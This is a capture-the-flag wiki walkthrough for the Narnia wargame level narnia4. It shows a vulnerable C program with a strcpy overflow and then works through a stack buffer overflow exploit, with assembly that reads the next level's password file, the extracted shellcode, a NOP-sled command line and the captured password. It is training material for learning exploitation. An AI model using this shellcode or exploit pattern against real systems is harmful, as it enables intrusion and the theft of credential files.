Narnia4 - narnia5

From JaxHax
Jump to navigation Jump to search

Code

//narnia4@melinda:/narnia$ cat narnia4.c 
/*
    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
*/

#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <ctype.h>

extern char **environ;

int main(int argc,char **argv){
	int i;
	char buffer[256];

	for(i = 0; environ[i] != NULL; i++)
		memset(environ[i], '\0', strlen(environ[i]));

	if(argc>1)
		strcpy(buffer,argv[1]);

	return 0;
}


Solution

Another buffer overflow but this time it clears the environment variables out making it so you can't use the EGG trick like we did last time. For this one I found it takes 272 bytes to reach the RET address. I created a custom payload for this one...

;$ cat narina4.asm

global _start

_start:
	;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
	; open(ptrToString, Readonly)
	;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
	xor eax, eax
	push eax
	mov al, 5
;	pop ebx
	push 0x3561696e
	push 0x72616e2f
	push 0x73736170
	push 0x5f61696e
	push 0x72616e2f
	push 0x6374652f
	mov ebx, esp
	xor ecx,ecx
	int 0x80

	;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
	; Read(fd, buffer, buffersize)
	;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
	mov ebx, eax  ; Move the file descriptor to ebx
;	sub esp, 50   ; Give some space on the stack
	xor eax, eax
	mov al, 3
	mov ecx, esp
	xor edx, edx
	mov dl, 50
	int 0x80

	;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
	; Write()
	;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
	mov al, 4
	xor ebx, ebx
	inc ebx
	int 0x80

	;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
	; exit
	;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
	xor eax, eax
	mov al, 1
	xor ebx, ebx
	int 0x80


And let's build and extract our shellcode.

$ ./buildnasm.sh narina4.asm 

 [*] Compiling narina4.asm with NASM...Done!
 [*] Linking the object file with ld...Done!
 [*] Removing Object file narina4.o...Done!
 [*] Done Son!

$ ./extract_shellcode.sh narina4

..::[ NASM Shellcode Extractor ]::..

-=[ Object Dump ]=-

Disassembly of section .text:
08048060 <_start>:
 8048060:	31 c0                	xor    %eax,%eax
 8048062:	50                   	push   %eax
 8048063:	b0 05                	mov    $0x5,%al
 8048065:	68 6e 69 61 35       	push   $0x3561696e
 804806a:	68 2f 6e 61 72       	push   $0x72616e2f
 804806f:	68 70 61 73 73       	push   $0x73736170
 8048074:	68 6e 69 61 5f       	push   $0x5f61696e
 8048079:	68 2f 6e 61 72       	push   $0x72616e2f
 804807e:	68 2f 65 74 63       	push   $0x6374652f
 8048083:	89 e3                	mov    %esp,%ebx
 8048085:	31 c9                	xor    %ecx,%ecx
 8048087:	cd 80                	int    $0x80
 8048089:	89 c3                	mov    %eax,%ebx
 804808b:	31 c0                	xor    %eax,%eax
 804808d:	b0 03                	mov    $0x3,%al
 804808f:	89 e1                	mov    %esp,%ecx
 8048091:	31 d2                	xor    %edx,%edx
 8048093:	b2 32                	mov    $0x32,%dl
 8048095:	cd 80                	int    $0x80
 8048097:	b0 04                	mov    $0x4,%al
 8048099:	31 db                	xor    %ebx,%ebx
 804809b:	43                   	inc    %ebx
 804809c:	cd 80                	int    $0x80
 804809e:	31 c0                	xor    %eax,%eax
 80480a0:	b0 01                	mov    $0x1,%al
 80480a2:	31 db                	xor    %ebx,%ebx
 80480a4:	cd 80                	int    $0x80

-=[ Extracted Shellcode (Length: 70) ]=-

\x31\xc0\x50\xb0\x05\x68\x6e\x69\x61\x35\x68\x2f\x6e\x61\x72\x68\x70\x61\x73\x73\x68\x6e\x69\x61\x5f\x68\x2f\x6e\x61\x72\x68\x2f\x65\x74\x63\x89\xe3\x31\xc9\xcd\x80\x89\xc3\x31\xc0\xb0\x03\x89\xe1\x31\xd2\xb2\x32\xcd\x80\xb0\x04\x31\xdb\x43\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80


for the return address... I just looked at GDB and found a general location for the stack. where my nopsled is... I just kept incrementing the second value of if running the program with strace till I saw it trying to run my shellcode.

narnia4@melinda:/narnia$ ./narnia4 $(perl -e ' print "\x90"x202; print "\x31\xc0\x50\xb0\x05\x68\x6e\x69\x61\x35\x68\x2f\x6e\x61\x72\x68\x70\x61\x73\x73\x68\x6e\x69\x61\x5f\x68\x2f\x6e\x61\x72\x68\x2f\x65\x74\x63\x89\xe3\x31\xc9\xcd\x80\x89\xc3\x31\xc0\xb0\x03\x89\xe1\x31\xd2\xb2\x32\xcd\x80\xb0\x04\x31\xdb\x43\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80"; print "\x01\xd8\xff\xff"')
faimahchiy